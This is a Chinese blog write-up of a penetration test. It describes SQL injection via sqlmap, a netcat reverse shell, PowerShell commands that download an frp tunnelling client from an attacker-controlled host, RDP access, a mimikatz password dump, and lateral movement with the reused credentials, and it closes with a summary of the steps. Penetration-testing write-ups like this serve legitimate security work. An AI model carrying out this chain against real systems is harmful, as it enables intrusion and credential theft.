• 记一次渗透测试事件


    一、漏洞发现
    拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入
    在这里插入图片描述
    进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限
    在这里插入图片描述
    os-shell执行命令太慢了,直接进行nc 反弹
    执行base64 加密后的powershell命令,反弹回shell
    在这里插入图片描述
    nc shell下加账号和密码成功,mstsc远程连接发现失败
    初步判断应该是在内网
    配置好frpc.exe 和frpc.ini 将其下载到目标服务器
    powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.ini’,‘frpc.ini’)
    powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.exe’,‘frpc.exe’)
    ./frpc.exe
    在frp管理页面看到目标端口已经上线
    在这里插入图片描述
    接下来进行mstsc远程连接
    在这里插入图片描述
    使用mimikatz 抓取其密码,直接报出明文
    在这里插入图片描述
    通过arp -a 发现其内网中还有一个活跃的服务器
    在这里插入图片描述
    直接在目标机上用爆出来的密码尝试远程登录,成功登录
    在这里插入图片描述

    二、总结一下思路
    1 、找到sql注入,且是sa
    2 、通过os-shell 反弹一个nc更容易执行命令
    3 、发现是管理员权限,直接加账号,如果不上,可以考虑通过msf 或是cs去提权
    4 、查询发现3389端口是开的,但是连接不上,考虑可能是在内网
    5 、尝试通过frp或者其他工具将其3389端口转发出来,再进行连接
    6 、登录成功后抓取用户名密码
    7 、通过arp 查询相关的内网中的通信和路由
    8 、尝试通过6爆出来的账号密码去碰撞其他内网机器

  • 相关阅读:
    基于注意力机制的LSTM液体管道非稳态工况检测
    前端教程-rollup
    C# dll代码混淆加密
    DSL查询语法
    SpringCloud - GateWay服务网关
    架构中的“大象”
    Ruoyi集成flyway后启动报错的解决方法
    mysql5.7 安装与自动备份数据库 和数据的恢复
    轻松6步完成App开发
    Hippo4J v1.3.1 发布,增加 Netty 监控上报、SpringCloud Hystrix 线程池监控等特性
  • 原文地址:https://blog.csdn.net/u010025272/article/details/134020223